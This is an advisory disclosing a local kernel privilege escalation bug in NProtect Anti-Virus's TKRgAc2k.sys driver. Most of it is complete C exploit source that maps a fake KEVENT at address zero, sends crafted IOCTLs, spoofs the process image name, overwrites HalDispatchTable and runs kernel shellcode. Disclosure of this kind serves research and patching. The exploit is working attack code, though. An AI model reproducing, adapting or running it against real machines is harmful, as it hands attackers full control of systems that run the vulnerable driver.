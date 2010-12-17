Home
NProtect Anti-Virus suffers from privilege escalation vulnerability.
Credit:
The information has been provided by MJ0011.
Vulnerable Systems:
* NProtect Anti-Virus 2007 to 2010.5.11.1
DETAILS:
TKRgAc2k.sys create a device called "TKRgAc",and handles these io control codes for:
0x22140:Receive registry monitor key value name MD5
0x221448:Receive Registry monitor key name
0x221444:Receive Registry key monitor enable
0x221410:Receive virus name that matchs the key value name MD5
0x220c54:Create share memory for receive virus notification
0x220c5c:Receive event handle for send virus notification
Tkacrg2k.sys create FileObject->FsContext for each process to open the device,and save key/key value /virus name /event object in FsContext. Here contains a design error , if a registry operation is intercepted and match the rules , but event handle has not been set, TKAcRg2k.sys will still be nofity of this event to ring3 with KeSetEvent(NULL,0). An attacker can allocate a fake KEVENT structure at zero address and overwrite any address with KEvent->WaitThreadList->KThread->WaitListEntry 's remove list entry operation.
EXPLOIT CODE:
// NP0DAY.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
typedef struct _STRING {
USHORT Length;
USHORT MaximumLength;
PCHAR Buffer;
} STRING;
typedef STRING *PSTRING;
typedef struct _RTL_DRIVE_LETTER_CURDIR {
USHORT Flags;
USHORT Length;
ULONG TimeStamp;
STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
#define RTL_MAX_DRIVE_LETTERS 32
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
typedef struct _CURDIR {
UNICODE_STRING DosPath;
HANDLE Handle;
} CURDIR, *PCURDIR;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
ULONG MaximumLength;
ULONG Length;
ULONG Flags;
ULONG DebugFlags;
HANDLE ConsoleHandle;
ULONG ConsoleFlags;
HANDLE StandardInput;
HANDLE StandardOutput;
HANDLE StandardError;
CURDIR CurrentDirectory; // ProcessParameters
UNICODE_STRING DllPath; // ProcessParameters
UNICODE_STRING ImagePathName; // ProcessParameters
UNICODE_STRING CommandLine; // ProcessParameters
PVOID Environment; // NtAllocateVirtualMemory
ULONG StartingX;
ULONG StartingY;
ULONG CountX;
ULONG CountY;
ULONG CountCharsX;
ULONG CountCharsY;
ULONG FillAttribute;
ULONG WindowFlags;
ULONG ShowWindowFlags;
UNICODE_STRING WindowTitle; // ProcessParameters
UNICODE_STRING DesktopInfo; // ProcessParameters
UNICODE_STRING ShellInfo; // ProcessParameters
UNICODE_STRING RuntimeData; // ProcessParameters
RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB {
BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the
BOOLEAN ReadImageFileExecOptions; //
BOOLEAN BeingDebugged; //
BOOLEAN SpareBool; //
HANDLE Mutant; // INITIAL_PEB structure is also updated.
PVOID ImageBaseAddress;
PVOID Ldr;
struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;
} PEB, *PPEB;
typedef LONG KPRIORITY;
typedef struct _PROCESS_BASIC_INFORMATION {
LONG ExitStatus;
PVOID PebBaseAddress;
ULONG_PTR AffinityMask;
KPRIORITY BasePriority;
ULONG_PTR UniqueProcessId;
ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;
typedef enum _EVENT_TYPE {
NotificationEvent,
SynchronizationEvent
} EVENT_TYPE;
typedef struct _DISPATCHER_HEADER {
union {
struct {
UCHAR Type;
union {
UCHAR Absolute;
UCHAR NpxIrql;
};
union {
UCHAR Size;
UCHAR Hand;
};
union {
UCHAR Inserted;
BOOLEAN DebugActive;
};
};
volatile LONG Lock;
};
LONG SignalState;
LIST_ENTRY WaitListHead;
} DISPATCHER_HEADER , *PDISPATCHER_HEADER;
typedef const UNICODE_STRING *PCUNICODE_STRING;
typedef enum _WAIT_TYPE {
WaitAll,
WaitAny
} WAIT_TYPE;
typedef struct _OBJECT_BASIC_INFORMATION {
ULONG Attributes;
ACCESS_MASK GrantedAccess;
ULONG HandleCount;
ULONG PointerCount;
ULONG PagedPoolCharge;
ULONG NonPagedPoolCharge;
ULONG Reserved[ 3 ];
ULONG NameInfoSize;
ULONG TypeInfoSize;
ULONG SecurityDescriptorSize;
LARGE_INTEGER CreationTime;
} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;
typedef struct _KWAIT_BLOCK {
LIST_ENTRY WaitListEntry;
PVOID kThread;
PVOID Object;
struct _KWAIT_BLOCK *NextWaitBlock;
USHORT WaitKey;
UCHAR WaitType;
} KWAIT_BLOCK, *PKWAIT_BLOCK, *PRKWAIT_BLOCK;
#include "malloc.h"
PVOID GetInfoTable(ULONG ATableType)
{
ULONG mSize = 0x4000;
PVOID mPtr = NULL;
LONG status;
HMODULE hlib = GetModuleHandle("ntdll.dll");
PVOID pZwQuerySystemInformation = GetProcAddress(hlib , "ZwQuerySystemInformation");
do
{
mPtr = malloc(mSize);
if (mPtr)
{
__asm
{
push 0
push mSize
push mPtr
push ATableType
call pZwQuerySystemInformation
mov status , eax
}
}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
}
} while (status == 0xc0000004);
if (status == 0)
{
return mPtr;
}
free(mPtr);
return NULL;
}
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2,
ULONG color
);
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
ULONG Color
);
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
PUCHAR *Str
);
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
INBV_DISPLAY_STRING_FILTER DisplayStringFilter
);
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
BOOLEAN bEnable
);
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2
);
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
PUCHAR Str
);
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ;
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ;
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ;
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ;
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ;
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ;
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ;
PINBV_DISPLAY_STRING InbvDisplayString= 0 ;
#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
UCHAR DisplayString[] =
" "
" "
" "
" ---- ===== EXPLOIT SUCCESSFULLY ==== ---- "
" "
" "
" NProtect AntiVirus 2007 Local Privilege Escalation Exploit "
" "
" VULNERABLE PRODUCT "
" "
" NProtect AntiVirus 2007 "
" "
" "
" VULERABLE FILE "
" TKRgAc2k.sys <= 2010.5.11.1 "
" "
" AUTHOR "
" "
" MJ0011 "
" th_decoder$126.com "
" "
" 2010-9-7 "
" "
" "
" ";
VOID InbvShellCode()
{
//DISABLE INTERRUPT
__asm
{
cli
}
//RESET TO VGA MODE
InbvAcquireDisplayOwnership();
InbvResetDisplay();
//FILL FULL SCREEN
InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK);
//SET TEXT COLOR
InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);
InbvInstallDisplayStringFilter(NULL);
InbvEnableDisplayString(TRUE);
InbvSetScrollRegion( 0 , 0 , 639 ,477);
InbvDisplayString(DisplayString);
while(TRUE)
{
};
}
BOOL InbvInit(PVOID ntosbase , PSTR ntosname)
{
HMODULE hlib = LoadLibrary(ntosname);
if (hlib == NULL)
{
return FALSE ;
}
InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase);
InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase);
InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase);
InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase);
InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase);
InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
if (InbvAcquireDisplayOwnership &&
InbvResetDisplay &&
InbvSolidColorFill &&
InbvSetTextColor &&
InbvInstallDisplayStringFilter &&
InbvEnableDisplayString &&
InbvSetScrollRegion &&
InbvDisplayString)
{
return TRUE ;
}
return FALSE ;
}
typedef struct MD5_STRING{
CHAR Md5[32];
}MD5_STRING , *PMD5_STRING;
typedef struct MD5_SEND{
ULONG Md5Number ;
ULONG DataLen ;
MD5_STRING Md5String[2];
}MD5_SEND , *PMD5_SEND;
typedef struct MON_RULE_SEND
{;
ULONG unknown ;
ULONG dataLen ;
CHAR RuleData1[10];
CHAR RuleData2[9];
}MON_RULE_SEND , *PMON_RULE_SEND;
typedef struct VIRUS_NAME_RULE_SEND
{
ULONG NumberOfName ;
ULONG TotalDataLen ;
CHAR Name[0x64];
}VIRUS_NAME_RULE_SEND , *PVIRUS_NAME_RULE_SEND;
int main(int argc, char* argv[])
{
printf("NProtect AntiVirus TKRgAc2k.sys <= 2010.5.11.1\n"
"Local Kernel Mode Privilege Escalation Vulnerability POC\n\n"
"Test On Windows XP SP3\n"
"by MJ0011 th_decoder$126.com\n"
"Press Enter....\n"
);
getchar();
PSYSTEM_MODULE_INFORMATION pmi = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
if (!InbvInit(pmi->Module[0].Base , strrchr(pmi->Module[0].ImageName , '\')+1))
{
printf("cannot init inbv system\n");
return 0 ;
}
HMODULE hntos = LoadLibrary(strrchr(pmi->Module[0].ImageName , '\')+1);
if (hntos == 0 )
{
printf("cannot load ntos\n");
return 0 ;
}
PVOID pHalDispatchTable = GetProcAddress(hntos , "HalDispatchTable");
pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable - (ULONG)hntos);
pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable + (ULONG)pmi->Module[0].Base);
PVOID xHalQuerySystemInformationAddr = (PVOID)((ULONG)pHalDispatchTable+ sizeof(ULONG));
FreeLibrary(hntos);
PVOID palloc = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtAllocateVirtualMemory");
ULONG nsize = 0x1000 ;
PVOID pBase = (PVOID)0x1 ;
LONG status ;
__asm
{
push 0x4
push 0x3000
lea eax , nsize
push eax
push 0
lea eax , pBase
push eax
push 0xffffffff
call palloc
mov status , eax
}
if (status != 0 )
{
printf("allocate at 0 failed! %08x\n",status);
getchar();
return 0 ;
}
//build fake KEVENT
PDISPATCHER_HEADER pdh = (PDISPATCHER_HEADER)0x0 ;
KWAIT_BLOCK kwb ;
BYTE pShellCode[0x20];
KWAIT_BLOCK kwbpdh ;
pdh->Type = SynchronizationEvent;
pdh->WaitListHead.Flink = (PLIST_ENTRY)&kwbpdh ;
PVOID pkthread = malloc(0x1000);
kwbpdh.WaitType = WaitAny ;
kwbpdh.kThread = pkthread;
*(ULONG*)((ULONG)pkthread+ 0x5c) = (ULONG)&kwb ;
kwb.WaitListEntry.Flink = (PLIST_ENTRY)pShellCode ;
kwb.WaitListEntry.Blink = (PLIST_ENTRY)xHalQuerySystemInformationAddr ;
kwb.NextWaitBlock = &kwb ;
//wait list entry
*(ULONG*)((ULONG)pkthread+ 0x60) = 0 ;
//Thread->Timer->Header->Inserted
*(BOOLEAN*)((ULONG)pkthread+ 0xF3) = FALSE ;
//Thread->Queue
*(ULONG*)((ULONG)pkthread+ 0xe4) = NULL ;
#define LOW_REALTIME_PRIORITY 16
//thread->Priority
*(BYTE*)((ULONG)pkthread+ 0x33) = LOW_REALTIME_PRIORITY ;
//thread->eprocess
PVOID pkprocess = malloc(0x1000);
*(ULONG*)((ULONG)pkthread+ 0x44) = (ULONG)pkprocess;
//kprocess->state
*(BYTE*)((ULONG)pkprocess + 0x65) = 2 ;
PVOID preadylist = malloc(0x1000);
*(ULONG*)((ULONG)pkprocess + 0x44) = (ULONG)preadylist;
HANDLE hdev = CreateFile("\\\\.\\TKRgAc" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0 , OPEN_EXISTING , 0 , 0 );
if (hdev == INVALID_HANDLE_VALUE)
{
printf("cannot open dev %u\n" , GetLastError());
return 0 ;
}
MD5_SEND ms ;
memset(&ms , 0 , sizeof(ms));
ms.DataLen = 32 * 2 + 8 ;
ms.Md5Number = 1 ;
strcpy(ms.Md5String->Md5 , "202CB962AC59075B964B07152D234B70");
//202CB962AC59075B964B07152D234B70 = "123"
ULONG btr ;
if (!DeviceIoControl(hdev , 0x22140C, &ms , sizeof(ms) , NULL , 0 , &btr , 0))
{
printf("send md5 %u\n", GetLastError());
getchar();
return 0 ;
}
MON_RULE_SEND mrs ;
memset(&mrs , 0 , sizeof(mrs));
mrs.dataLen = 0x13 ;
strcpy(mrs.RuleData1 , "*Classes*");
strcpy(mrs.RuleData2 , "*CLSID*");
if (!DeviceIoControl(hdev , 0x221448 , &mrs , sizeof(mrs) , NULL , 0 , &btr, 0 ))
{
printf("send rule %u\n",GetLastError());
getchar();
return 0 ;
}
BOOLEAN open741 = FALSE ;
if (!DeviceIoControl(hdev , 0x221008 , &open741 , sizeof(BOOLEAN) , NULL , 0 , &btr , 0 ))
{
printf("open 741 %u\n",GetLastError());
getchar();
return 0 ;
}
ULONG data[4];
data[0] = 0x1dfff ;
data[1] = 0x0 ;
data[2] = 0x1 ;
data[3] = 0x1 ;
if (!DeviceIoControl(hdev , 0x221444 , &data , sizeof(ULONG) * 4 , NULL , 0 , &btr , 0 ))
{
printf("set 724 %u\n" , GetLastError());
getchar();
return 0 ;
}
VIRUS_NAME_RULE_SEND vnrs ;
memset(&vnrs , 0 , sizeof(vnrs));
strcpy(vnrs.Name , "VULN ATTACK !!!! :)");
vnrs.NumberOfName = 1 ;
vnrs.TotalDataLen = 0x64 ;
if (!DeviceIoControl(hdev , 0x221410 , &vnrs , sizeof(vnrs ) , NULL , 0 , &btr , 0 ))
{
printf("send virus name %u\n" , GetLastError());
getchar();
return 0 ;
}
ULONG numbuf = 0x64 ;
ULONG outbuf[2];
if (!DeviceIoControl(hdev , 0x220C54 ,&numbuf , sizeof(ULONG) , &outbuf , sizeof(ULONG) * 2 , &btr , 0 ))
{
printf("set share memory %u\n" ,GetLastError());
getchar();
return 0 ;
}
//fake PEB bypass check
PVOID pqp = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQueryInformationProcess");
PROCESS_BASIC_INFORMATION pbi ;
nsize = sizeof(pbi);
__asm
{
push 0
push nsize
lea eax , pbi
push eax
push 0
push 0xffffffff
call pqp
}
PPEB peb = (PPEB)pbi.PebBaseAddress;
PVOID psavebuf = malloc(peb->ProcessParameters->ImagePathName.Length );
RtlCopyMemory(psavebuf , peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , L"iexplore.exe" , 26 );
HKEY hkey ;
if (RegOpenKey(HKEY_CLASSES_ROOT , "CLSID" , &hkey)==ERROR_SUCCESS)
{
DWORD regtype = REG_DWORD ;
DWORD Data = 0 ;
DWORD cbdata = 4;
//target KeSetEvent!
RegQueryValueEx(hkey , "123" , NULL , type , (LPBYTE)&Data , &cbdata);
}
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , psavebuf , peb->ProcessParameters->ImagePathName.Length);
//set shellcode
*(BYTE*)((ULONG)pShellCode) = 0xe9 ;
*(ULONG*)((ULONG)pShellCode + 0x1) = (ULONG)InbvShellCode - (ULONG)pShellCode - 0x5 ;
PVOID pqi = GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryIntervalProfile");
__asm
{
push 0
push 2
call pqi
}
return 0;
}
Disclosure Timeline:
Published: 2010-12-17
